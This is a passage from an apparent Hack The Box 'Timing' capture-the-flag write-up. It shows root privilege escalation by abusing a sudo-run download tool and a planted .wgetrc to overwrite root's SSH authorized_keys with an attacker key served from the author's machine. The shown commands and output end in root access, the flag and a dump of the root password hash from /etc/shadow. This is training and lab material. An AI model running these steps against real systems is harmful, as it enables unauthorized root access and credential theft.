ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDMR1r7B7aiEe6j+wBsVumAFqFXCiqw2iSrcg1S7rC1BdlVqr8YfWnT6e/e3+TAJk9idtLz/wN2MkupWtI1ddtNTJz31RQb0WMGjq7p8Usg0uIYhQH0PTN/GmPXDhqLIPcbTnNQMcV2PnwM07eXxQH0+s9rqVO8cR2z2f35bKe3WrHNnT7NwfOoWqNJxh+V8OGgfF8LhS0E46I6co76MJAIsX24Zs9r/dY+JPOlJlS3K2Kf3xSfPAScQeWip1WYY9depVuQywk12kOUikzGNjlQ4phNba47VjfycyV34cLw0/vQcDv5hMCfaK+hoE5rBXysnVx/f3n3zRYMLomgveQUCLBYUwJPE2t0VzeeX4W9wxrAOl2Njx5TI4cEFnmlp/6lO/iK+aC6BSBRxU19jS2fUchiN9PMgLSYGzhuIxOLvvd9AlaOYPNM7a5AfjzzO+gd1fv/Mb9EIZCKibtvpHp0eomnSDcDz/b9FNpbvg6V5NBVy2VaufcRbiBDD6cTS00= root@kali
┌──(root💀kali)-[~/hackthebox/machine/timing]
└─# chmod 600 id_rsa

Now we are set to execute this. Setup a HTTP server where your Kali SSH key file is and download it via netutils HTTP option.

1
2
3
4
5
6
7
8
9
10
11
12
┌──(root💀kali)-[~/hackthebox/machine/timing]
└─# mv index.html tmp/
┌──(root💀kali)-[~/hackthebox/machine/timing]
└─# cd tmp/                                                                                                          
┌──(root💀kali)-[~/hackthebox/machine/timing/tmp]
└─# ls
index.html
┌──(root💀kali)-[~/hackthebox/machine/timing/tmp]
└─# python -m SimpleHTTPServer 80                                                                                    
Serving HTTP on 0.0.0.0 port 80 ...
10.10.11.135 - - [18/Dec/2021 17:16:37] "GET / HTTP/1.0" 200 -
10.10.11.135 - - [18/Dec/2021 17:16:38] "GET / HTTP/1.0" 200 -
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
aaron@timing:~$ sudo /usr/bin/netutils
netutils v0.1
Select one option:
[0] FTP
[1] HTTP
[2] Quit
Input >> 1
Enter Url: http://10.10.14.30/
Initializing download: http://10.10.14.30/
File size: 563 bytes
Opening output file /root/.ssh/authorized_keys
Server unsupported, starting from scratch with one connection.
Starting download


Downloaded 563 byte in 0 seconds. (0.69 KB/s)

and we are root now

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
┌──(root💀kali)-[~/hackthebox/machine/timing]
└─# ssh -i id_rsa root@10.10.11.135
Welcome to Ubuntu 18.04.6 LTS (GNU/Linux 4.15.0-147-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sat Dec 18 17:33:24 UTC 2021

  System load:  0.04              Processes:           173
  Usage of /:   48.9% of 4.85GB   Users logged in:     1
  Memory usage: 10%               IP address for eth0: 10.10.11.135
  Swap usage:   0%


8 updates can be applied immediately.
8 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Tue Dec  7 12:08:29 2021
root@timing:~# id
uid=0(root) gid=0(root) groups=0(root)
root@timing:~# whoami
root
root@timing:~# cat root.txt 
59f6feb7623ce66e648e736cd3958e24
root@timing:~# cat /etc/shadow | grep root
root:$6$94dEO.yJ$NVRpUQ0JnWZJKDRr//hnXKGJeiXCVSYkdlxYt7UgkvIr/3z8pkQwoEd67QtnWALkGV9A.C8T3hGtxUeZIH7ZW.:18826:0:99999:7:::

privesclation via WGET (FTP)

There’s another method to do the same thing, but with WGET (FTP). This can be done by wgetrc

  • Wgetrc Commands (GNU Wget 1.21.1-dirty Manual)
1
2
aaron@timing:~$ cat .wgetrc
output_document = /root/.ssh/authorized_keys

Create a wget configuration file in ‘aaron’ users home directory. Setup a FTP server on Kali Linux.

1
2
3
4
5
6
7
8
┌──(root💀kali)-[~/hackthebox/machine/timing]
└─# cat authorized_keys 
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDMR1r7B7aiEe6j+wBsVumAFqFXCiqw2iSrcg1S7rC1BdlVqr8YfWnT6e/e3+TAJk9idtLz/wN2MkupWtI1ddtNTJz31RQb0WMGjq7p8Usg0uIYhQH0PTN/GmPXDhqLIPcbTnNQMcV2PnwM07eXxQH0+s9rqVO8cR2z2f35bKe3WrHNnT7NwfOoWqNJxh+V8OGgfF8LhS0E46I6co76MJAIsX24Zs9r/dY+JPOlJlS3K2Kf3xSfPAScQeWip1WYY9depVuQywk12kOUikzGNjlQ4phNba47VjfycyV34cLw0/vQcDv5hMCfaK+hoE5rBXysnVx/f3n3zRYMLomgveQUCLBYUwJPE2t0VzeeX4W9wxrAOl2Njx5TI4cEFnmlp/6lO/iK+aC6BSBRxU19jS2fUchiN9PMgLSYGzhuIxOLvvd9AlaOYPNM7a5AfjzzO+gd1fv/Mb9EIZCKibtvpHp0eomnSDcDz/b9FNpbvg6V5NBVy2VaufcRbiBDD6cTS00= root@kali┌──(root💀kali)-[~/hackthebox/machine/timing]
└─# python3 -m pyftpdlib -p 21
[I 2021-12-18 18:35:02] concurrency model: async
[I 2021-12-18 18:35:02] masquerade (NAT) address: None
[I 2021-12-18 18:35:02] passive ports: None
[I 2021-12-18 18:35:02] >>> starting FTP server on 0.0.0.0:21, pid=6362 <<<

Make sure you have authorized_keys file and start a python FTP severe.

1
2
3
4
5
6
7
8
aaron@timing:~$ sudo /usr/bin/netutils
netutils v0.1
Select one option:
[0] FTP
[1] HTTP
[2] Quit
Input >> 0
Enter Url+File: 10.10.14.30/authorized_keys
1
2
3
[I 2021-12-18 18:36:43] 10.10.11.135:35200-[anonymous] USER 'anonymous' logged in.
[I 2021-12-18 18:36:47] 10.10.11.135:35200-[anonymous] RETR /root/hackthebox/machine/timing/authorized_keys completed=1 bytes=562 seconds=0.004
[I 2021-12-18 18:36:47] 10.10.11.135:35200-[anonymous] FTP session closed (disconnect).

After this, you can login via SSH from Kali Linux.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
┌──(root💀kali)-[~/hackthebox/machine/timing]
└─# ssh -i id_rsa root@10.10.11.135
Welcome to Ubuntu 18.04.6 LTS (GNU/Linux 4.15.0-147-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sat Dec 18 18:40:23 UTC 2021

  System load:  0.02              Processes:           170
  Usage of /:   48.9% of 4.85GB   Users logged in:     0
  Memory usage: 11%               IP address for eth0: 10.10.11.135
  Swap usage:   0%


8 updates can be applied immediately.
8 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Sat Dec 18 18:14:36 2021 from 10.10.14.30
root@timing:~# id
uid=0(root) gid=0(root) groups=0(root)
root@timing:~# whoami
root
root@timing:~# cat root.txt
59f6feb7623ce66e648e736cd3958e24

Summary of knowledge

  • dir brute with gobuster
  • LFI bypass with php://filter
  • get file upload shell name using PHP interactive shell check the response time and match the time with PHP hash
  • .git leak ssh password
  • Privilege Escalation through shell script
  • pspy find suspicious process

Contact me

  • QQ: 1185151867
  • twitter: https://twitter.com/fdlucifer11
  • github: https://github.com/FDlucifer

I’m lUc1f3r11, a ctfer, reverse engineer, ioter, red teamer, coder, gopher, pythoner, AI lover, security reseacher, hacker, bug hunter and more…